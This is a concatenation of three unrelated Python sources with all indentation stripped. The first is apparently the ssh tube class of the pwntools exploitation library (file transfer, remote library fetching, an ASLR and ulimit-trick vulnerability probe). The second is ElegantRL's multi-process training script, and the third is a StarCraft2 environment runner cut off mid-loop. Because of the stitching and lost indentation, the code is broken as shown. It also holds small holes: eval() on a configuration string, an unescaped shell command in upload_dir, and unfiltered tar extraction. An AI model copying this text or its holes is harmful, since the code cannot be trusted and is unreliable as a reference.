self.info("Closed connection to %r" % self.host)
def _libs_remote(self, remote):
"""Return a dictionary of the libraries used by a remote file."""
escaped_remote = sh_string(remote)
cmd = ''.join([
'(',
'ulimit -s unlimited;',
'ldd %s > /dev/null &&' % escaped_remote,
'(',
'LD_TRACE_LOADED_OBJECTS=1 %s||' % escaped_remote,
'ldd %s' % escaped_remote,
'))',
' 2>/dev/null'
])
data, status = self.run_to_end(cmd)
if status != 0:
self.error('Unable to find libraries for %r' % remote)
return {}
return misc.parse_ldd_output(data)
def _get_fingerprint(self, remote):
cmd = '(sha256 || sha256sum || openssl sha256) 2>/dev/null < '
cmd = cmd + sh_string(remote)
data, status = self.run_to_end(cmd)
if status != 0:
return None
# OpenSSL outputs in the format of...
# (stdin)= e3b0c4429...
data = data.replace('(stdin)= ','')
# sha256 and sha256sum outputs in the format of...
# e3b0c442... -
data = data.replace('-','')
return data.strip()
def _get_cachefile(self, fingerprint):
return os.path.join(self._cachedir, fingerprint)
def _verify_local_fingerprint(self, fingerprint):
if not set(fingerprint).issubset(string.hexdigits) or \
len(fingerprint) != 64:
self.error('Invalid fingerprint %r' % fingerprint)
return False
local = self._get_cachefile(fingerprint)
if not os.path.isfile(local):
return False
if hashes.sha256filehex(local) == fingerprint:
return True
else:
os.unlink(local)
return False
def _download_raw(self, remote, local, h):
def update(has, total):
h.status("%s/%s" % (misc.size(has), misc.size(total)))
if self.sftp:
try:
self.sftp.get(remote, local, update)
return
except IOError:
pass
cmd = 'wc -c < ' + sh_string(remote)
total, exitcode = self.run_to_end(cmd)
if exitcode != 0:
h.failure("%r does not exist or is not accessible" % remote)
return
total = int(total)
with context.local(log_level = 'ERROR'):
cmd = 'cat < ' + sh_string(remote)
c = self.run(cmd)
data = ''
while True:
try:
data += c.recv()
except EOFError:
break
update(len(data), total)
result = c.wait()
if result != 0:
h.failure('Could not download file %r (%r)' % (remote, result))
return
with open(local, 'w') as fd:
fd.write(data)
def _download_to_cache(self, remote, p):
with context.local(log_level='error'):
remote = self.readlink('-f',remote)
fingerprint = self._get_fingerprint(remote)
if fingerprint is None:
local = os.path.normpath(remote)
local = os.path.basename(local)
local += time.strftime('-%Y-%m-%d-%H:%M:%S')
local = os.path.join(self._cachedir, local)
self._download_raw(remote, local, p)
return local
local = self._get_cachefile(fingerprint)
if self.cache and self._verify_local_fingerprint(fingerprint):
p.success('Found %r in ssh cache' % remote)
else:
self._download_raw(remote, local, p)
if not self._verify_local_fingerprint(fingerprint):
p.failure('Could not download file %r' % remote)
return local
def download_data(self, remote):
"""Downloads a file from the remote server and returns it as a string.
Arguments:
remote(str): The remote filename to download.
Examples:
>>> with file('/tmp/bar','w+') as f:
... f.write('Hello, world')
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass',
... cache=False)
>>> s.download_data('/tmp/bar')
'Hello, world'
>>> s._sftp = None
>>> s._tried_sftp = True
>>> s.download_data('/tmp/bar')
'Hello, world'
"""
with self.progress('Downloading %r' % remote) as p:
with open(self._download_to_cache(remote, p)) as fd:
return fd.read()
def download_file(self, remote, local = None):
"""Downloads a file from the remote server.
The file is cached in /tmp/pwntools-ssh-cache using a hash of the file, so
calling the function twice has little overhead.
Arguments:
remote(str): The remote filename to download
local(str): The local filename to save it to. Default is to infer it from the remote filename.
"""
if not local:
local = os.path.basename(os.path.normpath(remote))
if os.path.basename(remote) == remote:
remote = os.path.join(self.cwd, remote)
with self.progress('Downloading %r to %r' % (remote, local)) as p:
local_tmp = self._download_to_cache(remote, p)
# Check to see if an identical copy of the file already exists
if not os.path.exists(local) or hashes.sha256filehex(local_tmp) != hashes.sha256filehex(local):
shutil.copy2(local_tmp, local)
def download_dir(self, remote=None, local=None):
"""Recursively downloads a directory from the remote server
Arguments:
local: Local directory
remote: Remote directory
"""
remote = remote or self.cwd
if self.sftp:
remote = str(self.sftp.normalize(remote))
else:
with context.local(log_level='error'):
remote = self.system('readlink -f ' + sh_string(remote))
dirname = os.path.dirname(remote)
basename = os.path.basename(remote)
local = local or '.'
local = os.path.expanduser(local)
self.info("Downloading %r to %r" % (basename,local))
with context.local(log_level='error'):
remote_tar = self.mktemp()
cmd = 'tar -C %s -czf %s %s' % \
(sh_string(dirname),
sh_string(remote_tar),
sh_string(basename))
tar = self.system(cmd)
if 0 != tar.wait():
self.error("Could not create remote tar")
local_tar = tempfile.NamedTemporaryFile(suffix='.tar.gz')
self.download_file(remote_tar, local_tar.name)
tar = tarfile.open(local_tar.name)
tar.extractall(local)
def upload_data(self, data, remote):
"""Uploads some data into a file on the remote server.
Arguments:
data(str): The data to upload.
remote(str): The filename to upload it to.
Example:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> s.upload_data('Hello, world', '/tmp/upload_foo')
>>> print file('/tmp/upload_foo').read()
Hello, world
>>> s._sftp = False
>>> s._tried_sftp = True
>>> s.upload_data('Hello, world', '/tmp/upload_bar')
>>> print file('/tmp/upload_bar').read()
Hello, world
"""
# If a relative path was provided, prepend the cwd
if os.path.normpath(remote) == os.path.basename(remote):
remote = os.path.join(self.cwd, remote)
if self.sftp:
with tempfile.NamedTemporaryFile() as f:
f.write(data)
f.flush()
self.sftp.put(f.name, remote)
return
with context.local(log_level = 'ERROR'):
cmd = 'cat > ' + sh_string(remote)
s = self.run(cmd, tty=False)
s.send(data)
s.shutdown('send')
data = s.recvall()
result = s.wait()
if result != 0:
self.error("Could not upload file %r (%r)\n%s" % (remote, result, data))
def upload_file(self, filename, remote = None):
"""Uploads a file to the remote server. Returns the remote filename.
Arguments:
filename(str): The local filename to download
remote(str): The remote filename to save it to. Default is to infer it from the local filename."""
if remote == None:
remote = os.path.normpath(filename)
remote = os.path.basename(remote)
remote = os.path.join(self.cwd, remote)
with open(filename) as fd:
data = fd.read()
self.info("Uploading %r to %r" % (filename,remote))
self.upload_data(data, remote)
return remote
def upload_dir(self, local, remote=None):
"""Recursively uploads a directory onto the remote server
Arguments:
local: Local directory
remote: Remote directory
"""
remote = remote or self.cwd
local = os.path.expanduser(local)
dirname = os.path.dirname(local)
basename = os.path.basename(local)
if not os.path.isdir(local):
self.error("%r is not a directory" % local)
msg = "Uploading %r to %r" % (basename,remote)
with self.waitfor(msg) as w:
# Generate a tarfile with everything inside of it
local_tar = tempfile.mktemp()
with tarfile.open(local_tar, 'w:gz') as tar:
tar.add(local, basename)
# Upload and extract it
with context.local(log_level='error'):
remote_tar = self.mktemp('--suffix=.tar.gz')
self.upload_file(local_tar, remote_tar)
untar = self.run('cd %s && tar -xzf %s' % (remote, remote_tar))
message = untar.recvrepeat(2)
if untar.wait() != 0:
self.error("Could not untar %r on the remote end\n%s" % (remote_tar, message))
def upload(self, file_or_directory, remote=None):
"""upload(file_or_directory, remote=None)
Upload a file or directory to the remote host.
Arguments:
file_or_directory(str): Path to the file or directory to download.
remote(str): Local path to store the data.
By default, uses the working directory.
"""
if isinstance(file_or_directory, str):
file_or_directory = os.path.expanduser(file_or_directory)
file_or_directory = os.path.expandvars(file_or_directory)
if os.path.isfile(file_or_directory):
return self.upload_file(file_or_directory, remote)
if os.path.isdir(file_or_directory):
return self.upload_dir(file_or_directory, remote)
self.error('%r does not exist' % file_or_directory)
def download(self, file_or_directory, local=None):
"""download(file_or_directory, local=None)
Download a file or directory from the remote host.
Arguments:
file_or_directory(str): Path to the file or directory to download.
local(str): Local path to store the data.
By default, uses the current directory.
"""
if not self.sftp:
self.error("Cannot determine remote file type without SFTP")
with self.system('test -d ' + sh_string(file_or_directory)) as io:
is_dir = io.wait()
if 0 == is_dir:
self.download_dir(file_or_directory, local)
else:
self.download_file(file_or_directory, local)
put = upload
get = download
def unlink(self, file):
"""unlink(file)
Delete the file on the remote host
Arguments:
file(str): Path to the file
"""
if not self.sftp:
self.error("unlink() is only supported if SFTP is supported")
return self.sftp.unlink(file)
def libs(self, remote, directory = None):
"""Downloads the libraries referred to by a file.
This is done by running ldd on the remote server, parsing the output
and downloading the relevant files.
The directory argument specified where to download the files. This defaults
to './$HOSTNAME' where $HOSTNAME is the hostname of the remote server."""
libs = self._libs_remote(remote)
remote = self.readlink('-f',remote).strip()
libs[remote] = 0
if directory == None:
directory = self.host
directory = os.path.realpath(directory)
res = {}
seen = set()
for lib, addr in libs.items():
local = os.path.realpath(os.path.join(directory, '.' + os.path.sep + lib))
if not local.startswith(directory):
self.warning('This seems fishy: %r' % lib)
continue
misc.mkdir_p(os.path.dirname(local))
if lib not in seen:
self.download_file(lib, local)
seen.add(lib)
res[local] = addr
return res
def interactive(self, shell=None):
"""Create an interactive session.
This is a simple wrapper for creating a new
:class:`pwnlib.tubes.ssh.ssh_channel` object and calling
:meth:`pwnlib.tubes.ssh.ssh_channel.interactive` on it."""
s = self.shell(shell)
if self.cwd != '.':
cmd = 'cd ' + sh_string(self.cwd)
s.sendline(cmd)
s.interactive()
s.close()
def set_working_directory(self, wd = None, symlink = False):
"""Sets the working directory in which future commands will
be run (via ssh.run) and to which files will be uploaded/downloaded
from if no path is provided
Note:
This uses ``mktemp -d`` under the covers, sets permissions
on the directory to ``0700``. This means that setuid binaries
will **not** be able to access files created in this directory.
In order to work around this, we also ``chmod +x`` the directory.
Arguments:
wd(string): Working directory. Default is to auto-generate a directory
based on the result of running 'mktemp -d' on the remote machine.
symlink(bool,str): Create symlinks in the new directory.
The default value, ``False``, implies that no symlinks should be
created.
A string value is treated as a path that should be symlinked.
It is passed directly to the shell on the remote end for expansion,
so wildcards work.
Any other value is treated as a boolean, where ``True`` indicates
that all files in the "old" working directory should be symlinked.
Examples:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> cwd = s.set_working_directory()
>>> s.ls()
''
>>> s.pwd() == cwd
True
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> homedir = s.pwd()
>>> _=s.touch('foo')
>>> _=s.set_working_directory()
>>> assert s.ls() == ''
>>> _=s.set_working_directory(homedir)
>>> assert 'foo' in s.ls().split()
>>> _=s.set_working_directory(symlink=True)
>>> assert 'foo' in s.ls().split()
>>> assert homedir != s.pwd()
>>> symlink=os.path.join(homedir,'*')
>>> _=s.set_working_directory(symlink=symlink)
>>> assert 'foo' in s.ls().split()
>>> assert homedir != s.pwd()
"""
status = 0
if symlink and not isinstance(symlink, str):
symlink = os.path.join(self.pwd(), '*')
if not wd:
wd, status = self.run_to_end('x=$(mktemp -d) && cd $x && chmod +x . && echo $PWD', wd='.')
wd = wd.strip()
if status:
self.error("Could not generate a temporary directory (%i)\n%s" % (status, wd))
else:
cmd = 'ls ' + sh_string(wd)
_, status = self.run_to_end(cmd, wd = '.')
if status:
self.error("%r does not appear to exist" % wd)
self.info("Working directory: %r" % wd)
self.cwd = wd
if symlink:
self.ln('-s', symlink, '.')
return self.cwd
def write(self, path, data):
"""Wrapper around upload_data to match :func:`pwnlib.util.misc.write`"""
return self.upload_data(data, path)
def read(self, path):
"""Wrapper around download_data to match :func:`pwnlib.util.misc.read`"""
return self.download_data(path)
def _init_remote_platform_info(self):
"""Fills _platform_info, e.g.:
::
{'distro': 'Ubuntu\n',
'distro_ver': '14.04\n',
'machine': 'x86_64',
'node': 'pwnable.kr',
'processor': 'x86_64',
'release': '3.11.0-12-generic',
'system': 'linux',
'version': '#19-ubuntu smp wed oct 9 16:20:46 utc 2013'}
"""
if self._platform_info:
return
def preexec():
import platform
print('\n'.join(platform.uname()))
with context.quiet:
with self.process('true', preexec_fn=preexec) as io:
self._platform_info = {
'system': io.recvline().lower().strip(),
'node': io.recvline().lower().strip(),
'release': io.recvline().lower().strip(),
'version': io.recvline().lower().strip(),
'machine': io.recvline().lower().strip(),
'processor': io.recvline().lower().strip(),
'distro': 'Unknown',
'distro_ver': ''
}
try:
if not self.which('lsb_release'):
return
with self.process(['lsb_release', '-irs']) as io:
self._platform_info.update({
'distro': io.recvline().strip(),
'distro_ver': io.recvline().strip()
})
except Exception:
pass
@property
def os(self):
""":class:`str`: Operating System of the remote machine."""
try:
self._init_remote_platform_info()
with context.local(os=self._platform_info['system']):
return context.os
except Exception:
return "Unknown"
@property
def arch(self):
""":class:`str`: CPU Architecture of the remote machine."""
try:
self._init_remote_platform_info()
with context.local(arch=self._platform_info['machine']):
return context.arch
except Exception:
return "Unknown"
@property
def bits(self):
""":class:`str`: Pointer size of the remote machine."""
try:
with context.local():
context.clear()
context.arch = self.arch
return context.bits
except Exception:
return context.bits
@property
def version(self):
""":class:`tuple`: Kernel version of the remote machine."""
try:
self._init_remote_platform_info()
vers = self._platform_info['release']
# 3.11.0-12-generic
expr = r'([0-9]+\.?)+'
vers = re.search(expr, vers).group()
return tuple(map(int, vers.split('.')))
except Exception:
return (0,0,0)
@property
def distro(self):
""":class:`tuple`: Linux distribution name and release."""
try:
self._init_remote_platform_info()
return (self._platform_info['distro'], self._platform_info['distro_ver'])
except Exception:
return ("Unknown", "Unknown")
@property
def aslr(self):
""":class:`bool`: Whether ASLR is enabled on the system.
Example:
>>> s = ssh("travis", "example.pwnme")
>>> s.aslr
True
"""
if self._aslr is None:
if self.os != 'linux':
self.warn_once("Only Linux is supported for ASLR checks.")
self._aslr = False
else:
with context.quiet:
rvs = self.read('/proc/sys/kernel/randomize_va_space')
self._aslr = not rvs.startswith('0')
return self._aslr
@property
def aslr_ulimit(self):
""":class:`bool`: Whether the entropy of 32-bit processes can be reduced with ulimit."""
import pwnlib.elf.elf
import pwnlib.shellcraft
if self._aslr_ulimit is not None:
return self._aslr_ulimit
# This test must run a 32-bit binary, fix the architecture
arch = {
'amd64': 'i386',
'aarch64': 'arm'
}.get(self.arch, self.arch)
with context.local(arch=arch, bits=32, os=self.os, aslr=True):
with context.quiet:
try:
sc = pwnlib.shellcraft.cat('/proc/self/maps') \
+ pwnlib.shellcraft.exit(0)
elf = pwnlib.elf.elf.ELF.from_assembly(sc, shared=True)
except Exception:
self.warn_once("Can't determine ulimit ASLR status")
self._aslr_ulimit = False
return self._aslr_ulimit
def preexec():
import resource
try:
resource.setrlimit(resource.RLIMIT_STACK, (-1, -1))
except Exception:
pass
# Move to a new temporary directory
cwd = self.cwd
tmp = self.set_working_directory()
try:
self.upload(elf.path, './aslr-test')
except IOError:
self.warn_once("Couldn't check ASLR ulimit trick")
self._aslr_ulimit = False
return False
self.process(['chmod', '+x', './aslr-test']).wait()
maps = self.process(['./aslr-test'], preexec_fn=preexec).recvall()
# Move back to the old directory
self.cwd = cwd
# Clean up the files
self.process(['rm', '-rf', tmp]).wait()
# Check for 555555000 (1/3 of the address space for PAE)
# and for 40000000 (1/3 of the address space with 3BG barrier)
self._aslr_ulimit = bool('55555000' in maps or '40000000' in maps)
return self._aslr_ulimit
def _checksec_cache(self, value=None):
path = self._get_cachefile('%s-%s' % (self.host, self.port))
if value is not None:
with open(path, 'w+') as f:
f.write(value)
elif os.path.exists(path):
with open(path, 'r+') as f:
return f.read()
def checksec(self, banner=True):
"""checksec()
Prints a helpful message about the remote system.
Arguments:
banner(bool): Whether to print the path to the ELF binary.
"""
cached = self._checksec_cache()
if cached:
return cached
red = text.red
green = text.green
yellow = text.yellow
res = [
"%s@%s:" % (self.user, self.host),
"Distro".ljust(10) + ' '.join(self.distro),
"OS:".ljust(10) + self.os,
"Arch:".ljust(10) + self.arch,
"Version:".ljust(10) + '.'.join(map(str, self.version)),
"ASLR:".ljust(10) + {
True: green("Enabled"),
False: red("Disabled")
}[self.aslr]
]
if self.aslr_ulimit:
res += [ "Note:".ljust(10) + red("Susceptible to ASLR ulimit trick (CVE-2016-3672)")]
cached = '\n'.join(res)
self._checksec_cache(cached)
return cached
|
run_parallel.py | import os
import sys
import time
import torch
import numpy as np
import multiprocessing as mp
from elegantrl.envs.Gym import build_env, build_eval_env
from elegantrl.train.replay_buffer import ReplayBufferMP
from elegantrl.train.evaluator import Evaluator
def train_and_evaluate_mp(args, agent_id=0):
args.init_before_training() # necessary!
process = list()
mp.set_start_method(method='spawn', force=True) # force all the multiprocessing to 'spawn' methods
'''learner'''
learner_num = len(args.learner_gpus)
learner_pipe = PipeLearner(learner_num)
for learner_id in range(learner_num):
'''evaluator'''
if learner_id == learner_num - 1:
evaluator_pipe = PipeEvaluator()
process.append(mp.Process(target=evaluator_pipe.run, args=(args, agent_id)))
else:
evaluator_pipe = None
'''explorer'''
worker_pipe = PipeWorker(args.env_num, args.worker_num)
for worker_id in range(args.worker_num):
process.append(mp.Process(target=worker_pipe.run, args=(args, worker_id, learner_id)))
process.append(mp.Process(target=learner_pipe.run, args=(args, evaluator_pipe, worker_pipe, learner_id)))
[(p.start(), time.sleep(0.1)) for p in process]
process[-1].join()
process_safely_terminate(process)
class PipeWorker:
def __init__(self, env_num, worker_num):
self.env_num = env_num
self.worker_num = worker_num
self.pipes = [mp.Pipe() for _ in range(worker_num)]
self.pipe1s = [pipe[1] for pipe in self.pipes]
def explore(self, agent):
act_dict = agent.act.state_dict()
if sys.platform == 'win32': # Avoid CUDA runtime error (801)
# Python3.9< multiprocessing can't send torch.tensor_gpu in WinOS. So I send torch.tensor_cpu
for key, value in act_dict.items():
act_dict[key] = value.to(torch.device('cpu'))
for worker_id in range(self.worker_num):
self.pipe1s[worker_id].send(act_dict)
traj_lists = [pipe1.recv() for pipe1 in self.pipe1s]
return traj_lists
def run(self, args, worker_id, learner_id): # not elegant: comm_env
# print(f'| os.getpid()={os.getpid()} PipeExplore.run {learner_id}')
env = build_env(env=args.env, if_print=False,
env_num=args.env_num, device_id=args.workers_gpus[learner_id], args=args, )
'''init Agent'''
agent = args.agent
agent.init(net_dim=args.net_dim, state_dim=args.state_dim, action_dim=args.action_dim,
gamma=args.gamma, reward_scale=args.reward_scale,
learning_rate=args.learning_rate, if_per_or_gae=args.if_per_or_gae,
env_num=args.env_num, gpu_id=args.learner_gpus[learner_id], )
if args.env_num == 1:
agent.states = [env.reset(), ]
else:
agent.states = env.reset() # VecEnv
'''loop'''
target_step = args.target_step
del args
with torch.no_grad():
while True:
act_dict = self.pipes[worker_id][0].recv()
if sys.platform == 'win32':
# Python3.9< multiprocessing can't send torch.tensor_gpu in WinOS. So I send torch.tensor_cpu
for key, value in act_dict.items():
act_dict[key] = value.to(agent.device)
agent.act.load_state_dict(act_dict)
trajectory = agent.explore_env(env, target_step)
if sys.platform == 'win32':
# Python3.9< multiprocessing can't send torch.tensor_gpu in WinOS. So I send torch.tensor_cpu
trajectory = [[item.to(torch.device('cpu'))
for item in item_list]
for item_list in trajectory]
self.pipes[worker_id][0].send(trajectory)
class PipeLearner:
def __init__(self, learner_num):
self.learner_num = learner_num
self.round_num = int(np.log2(learner_num))
self.pipes = [mp.Pipe() for _ in range(learner_num)]
pipes = [mp.Pipe() for _ in range(learner_num)]
self.pipe0s = [pipe[0] for pipe in pipes]
self.pipe1s = [pipe[1] for pipe in pipes]
self.device_list = [torch.device(f'cuda:{i}') for i in range(learner_num)]
if learner_num == 1:
self.idx_l = None
elif learner_num == 2:
self.idx_l = [(1,), (0,), ]
elif learner_num == 4:
self.idx_l = [(1, 2), (0, 3),
(3, 0), (2, 1), ]
elif learner_num == 8:
self.idx_l = [(1, 2, 4), (0, 3, 5),
(3, 0, 6), (2, 1, 7),
(5, 6, 0), (4, 7, 1),
(7, 4, 2), (6, 5, 3), ]
else:
print(f"| LearnerPipe, ERROR: learner_num {learner_num} should in (1, 2, 4, 8)")
exit()
def comm_data(self, data, learner_id, round_id):
if round_id == -1:
learner_jd = self.idx_l[learner_id][round_id]
self.pipes[learner_jd][0].send(data)
return self.pipes[learner_id][1].recv()
else:
learner_jd = self.idx_l[learner_id][round_id]
self.pipe0s[learner_jd].send(data)
return self.pipe1s[learner_id].recv()
def comm_network_optim(self, agent, learner_id):
device = self.device_list[learner_id]
for round_id in range(self.round_num):
data = get_comm_data(agent)
data = self.comm_data(data, learner_id, round_id)
if data:
avg_update_net(agent.act, data[0], device)
avg_update_optim(agent.act_optim, data[1], device) if data[1] else None
avg_update_net(agent.cri, data[2], device) if data[2] else None
avg_update_optim(agent.cri_optim, data[3], device)
avg_update_net(agent.act_target, data[4], device) if agent.if_use_act_target else None
avg_update_net(agent.cri_target, data[5], device) if agent.if_use_cri_target else None
def run(self, args, comm_eva, comm_exp, learner_id=0):
# print(f'| os.getpid()={os.getpid()} PipeLearn.run, {learner_id}')
pass
'''init Agent'''
agent = args.agent
agent.init(net_dim=args.net_dim, state_dim=args.state_dim, action_dim=args.action_dim,
gamma=args.gamma, reward_scale=args.reward_scale,
learning_rate=args.learning_rate, if_per_or_gae=args.if_per_or_gae,
env_num=args.env_num, gpu_id=args.learner_gpus[learner_id], )
agent.save_or_load_agent(args.cwd, if_save=False)
'''init ReplayBuffer'''
if agent.if_off_policy:
buffer_num = args.worker_num * args.env_num
if self.learner_num > 1:
buffer_num *= 2
buffer = ReplayBufferMP(max_len=args.max_memo, state_dim=args.state_dim,
action_dim=1 if args.if_discrete else args.action_dim,
if_use_per=args.if_per_or_gae,
buffer_num=buffer_num, gpu_id=args.learner_gpus[learner_id])
buffer.save_or_load_history(args.cwd, if_save=False)
def update_buffer(_traj_list):
step_sum = 0
r_exp_sum = 0
for buffer_i, (ten_state, ten_other) in enumerate(_traj_list):
buffer.buffers[buffer_i].extend_buffer(ten_state, ten_other)
step_r_exp = get_step_r_exp(ten_reward=ten_other[:, 0]) # other = (reward, mask, action)
step_sum += step_r_exp[0]
r_exp_sum += step_r_exp[1]
return step_sum, r_exp_sum / len(_traj_list)
else:
buffer = list()
def update_buffer(_traj_list):
_traj_list = list(map(list, zip(*_traj_list)))
_traj_list = [torch.cat(t, dim=0) for t in _traj_list]
(ten_state, ten_reward, ten_mask, ten_action, ten_noise) = _traj_list
buffer[:] = (ten_state.squeeze(1),
ten_reward,
ten_mask,
ten_action.squeeze(1),
ten_noise.squeeze(1))
_step, _r_exp = get_step_r_exp(ten_reward=buffer[1])
return _step, _r_exp
'''start training'''
cwd = args.cwd
batch_size = args.batch_size
repeat_times = args.repeat_times
soft_update_tau = args.soft_update_tau
del args
if_train = True
while if_train:
traj_lists = comm_exp.explore(agent)
if self.learner_num > 1:
data = self.comm_data(traj_lists, learner_id, round_id=-1)
traj_lists.extend(data)
traj_list = sum(traj_lists, list())
if sys.platform == 'win32': # Avoid CUDA runtime error (801)
# Python3.9< multiprocessing can't send torch.tensor_gpu in WinOS. So I send torch.tensor_cpu
traj_list = [[item.to(torch.device('cpu'))
for item in item_list]
for item_list in traj_list]
steps, r_exp = update_buffer(traj_list)
del traj_lists
logging_tuple = agent.update_net(buffer, batch_size, repeat_times, soft_update_tau)
if self.learner_num > 1:
self.comm_network_optim(agent, learner_id)
if comm_eva:
if_train, if_save = comm_eva.evaluate_and_save_mp(agent.act, steps, r_exp, logging_tuple)
agent.save_or_load_agent(cwd, if_save=True)
if agent.if_off_policy:
print(f"| LearnerPipe.run: ReplayBuffer saving in {cwd}")
buffer.save_or_load_history(cwd, if_save=True)
class PipeEvaluator: # [ElegantRL.10.21]
def __init__(self):
super().__init__()
self.pipe0, self.pipe1 = mp.Pipe()
def evaluate_and_save_mp(self, agent_act, steps, r_exp, logging_tuple):
if self.pipe1.poll(): # if_evaluator_idle
if_train, if_save = self.pipe1.recv()
act_cpu_dict = {k: v.cpu() for k, v in agent_act.state_dict().items()}
else:
if_train, if_save = True, False
act_cpu_dict = None
self.pipe1.send((act_cpu_dict, steps, r_exp, logging_tuple))
return if_train, if_save
def run(self, args, agent_id):
# print(f'| os.getpid()={os.getpid()} PipeEvaluate.run {agent_id}')
pass
'''init: Agent'''
agent = args.agent
agent.init(net_dim=args.net_dim, state_dim=args.state_dim, action_dim=args.action_dim,
gamma=args.gamma, reward_scale=args.reward_scale,
learning_rate=args.learning_rate, if_per_or_gae=args.if_per_or_gae,
env_num=args.env_num, gpu_id=args.eval_gpu_id, )
agent.save_or_load_agent(args.cwd, if_save=False)
act = agent.act
[setattr(param, 'requires_grad', False) for param in agent.act.parameters()]
del agent
'''init Evaluator'''
eval_env = build_eval_env(args.eval_env, args.env, args.env_num, args.eval_gpu_id, args)
evaluator = Evaluator(cwd=args.cwd, agent_id=agent_id,
eval_env=eval_env, eval_gap=args.eval_gap,
eval_times1=args.eval_times1, eval_times2=args.eval_times2,
target_return=args.target_return, if_overwrite=args.if_overwrite)
evaluator.save_or_load_recoder(if_save=False)
'''loop'''
cwd = args.cwd
break_step = args.break_step
if_allow_break = args.if_allow_break
del args
if_save = False
if_train = True
if_reach_goal = False
with torch.no_grad():
while if_train:
act_dict, steps, r_exp, logging_tuple = self.pipe0.recv()
if act_dict:
act.load_state_dict(act_dict)
if_reach_goal, if_save = evaluator.evaluate_and_save(act, steps, r_exp, logging_tuple)
else:
evaluator.total_step += steps
if_train = not ((if_allow_break and if_reach_goal)
or evaluator.total_step > break_step
or os.path.exists(f'{cwd}/stop'))
self.pipe0.send((if_train, if_save))
print(f'| UsedTime: {time.time() - evaluator.start_time:>7.0f} | SavedDir: {cwd}')
evaluator.save_or_load_recoder(if_save=True)
def get_comm_data(agent):
act = list(agent.act.parameters())
cri_optim = get_optim_parameters(agent.cri_optim)
if agent.cri is agent.act:
cri = None
act_optim = None
else:
cri = list(agent.cri.parameters())
act_optim = get_optim_parameters(agent.act_optim)
act_target = list(agent.act_target.parameters()) if agent.if_use_act_target else None
cri_target = list(agent.cri_target.parameters()) if agent.if_use_cri_target else None
return act, act_optim, cri, cri_optim, act_target, cri_target # data
"""Utils"""
def get_step_r_exp(ten_reward):
return len(ten_reward), ten_reward.mean().item()
def get_num_learner(visible_gpu):
assert isinstance(visible_gpu, str) # visible_gpu may in {'0', '1', '1,', '1,2', '1,2,'}
visible_gpu = eval(visible_gpu)
num_learner = 1 if isinstance(visible_gpu, int) else len(visible_gpu)
return num_learner
def process_safely_terminate(process):
for p in process:
try:
p.kill()
except OSError as e:
print(e)
pass
def get_optim_parameters(optim): # for avg_update_optim()
params_list = list()
for params_dict in optim.state_dict()['state'].values():
params_list.extend([t for t in params_dict.values() if isinstance(t, torch.Tensor)])
return params_list
def avg_update_optim(dst_optim, src_optim_param, device):
for dst, src in zip(get_optim_parameters(dst_optim), src_optim_param):
dst.data.copy_((dst.data + src.data.to(device)) * 0.5)
# dst.data.copy_(src.data * tau + dst.data * (1 - tau))
def avg_update_net(dst_net, src_net_param, device):
for dst, src in zip(dst_net.parameters(), src_net_param):
dst.data.copy_((dst.data + src.data.to(device)) * 0.5)
from envs.starcraft import StarCraft2Env
from functools import partial
from train.replay_buffer import EpisodeBatch
from multiprocessing import Pipe, Process
import numpy as np
import torch as th
def env_fn1(env, **kwargs) :
return env(**kwargs)
class ParallelRunner:
def __init__(self, args, logger):
self.args = args
self.logger = logger
self.batch_size = self.args.batch_size_run
# Make subprocesses for the envs
self.parent_conns, self.worker_conns = zip(*[Pipe() for _ in range(self.batch_size)])
env_fn = partial(env_fn1, env=StarCraft2Env)
self.ps = []
for i, worker_conn in enumerate(self.worker_conns):
ps = Process(target=env_worker,
args=(worker_conn, CloudpickleWrapper(partial(env_fn, **self.args.env_args))))
self.ps.append(ps)
for p in self.ps:
p.daemon = True
p.start()
self.parent_conns[0].send(("get_env_info", None))
self.env_info = self.parent_conns[0].recv()
self.episode_limit = self.env_info["episode_limit"]
self.t = 0
self.t_env = 0
self.train_returns = []
self.test_returns = []
self.train_stats = {}
self.test_stats = {}
self.log_train_stats_t = -100000
def setup(self, scheme, groups, preprocess, mac):
self.new_batch = partial(EpisodeBatch, scheme, groups, self.batch_size, self.episode_limit + 1,
preprocess=preprocess, device=self.args.device)
self.mac = mac
self.scheme = scheme
self.groups = groups
self.preprocess = preprocess
def get_env_info(self):
return self.env_info
def save_replay(self):
pass
def close_env(self):
for parent_conn in self.parent_conns:
parent_conn.send(("close", None))
def reset(self):
self.batch = self.new_batch()
# Reset the envs
for parent_conn in self.parent_conns:
parent_conn.send(("reset", None))
pre_transition_data = {
"state": [],
"avail_actions": [],
"obs": []
}
# Get the obs, state and avail_actions back
for parent_conn in self.parent_conns:
data = parent_conn.recv()
pre_transition_data["state"].append(data["state"])
pre_transition_data["avail_actions"].append(data["avail_actions"])
pre_transition_data["obs"].append(data["obs"])
self.batch.update(pre_transition_data, ts=0)
self.t = 0
self.env_steps_this_run = 0
def run(self, test_mode=False):
self.reset()
all_terminated = False
episode_returns = [0 for _ in range(self.batch_size)]
episode_lengths = [0 for _ in range(self.batch_size)]
self.mac.init_hidden(batch_size=self.batch_size)
terminated = [False for _ in range(self.batch_size)]
envs_not_terminated = [b_idx for b_idx, termed in enumerate(terminated) if not termed]
final_env_infos = [] # may store extra stats like battle won. this is filled in ORDER OF TERMINATION
save_probs = getattr(self.args, "save_probs", False)
while True:
# Pass the entire batch of experiences up till now to the agents
# Receive the actions for each agent at this timestep in a batch for each un-terminated env
if save_probs:
actions, probs = self.mac.select_actions(self.batch, t_ep=self.t, t_env=self.t_env, bs=envs_not_terminated, test_mode=test_mode)
else:
actions = self.mac.select_actions(self.batch, t_ep=self.t, t_env=self.t_env, bs=envs_not_terminated, test_mode=test_mode)
cpu_actions = actions.to("cpu").numpy()
# Update the actions taken
actions_chosen = {
"actions": actions.unsqueeze(1).to("cpu"),
}
if save_probs:
actions_chosen["probs"] = probs.unsqueeze(1).to("cpu")
self.batch.update(actions_chosen, bs=envs_not_terminated, ts=self.t, mark_filled=False)
# Send actions to each env
action_idx = 0
for idx, parent_conn in enumerate(self.parent_conns):
if idx in envs_not_terminated: # We produced actions for this env
if not terminated[idx]: # Only send the actions to the env if it hasn't terminated
parent_conn.send(("step", cpu_actions[action_idx]))
action_idx += 1 # actions is not a list over every env
# Update envs_not_terminated
envs_not_terminated = [b_idx for b_idx, termed in enumerate(terminated) if not termed]
all_terminated = all(terminated)
if all_terminated:
break
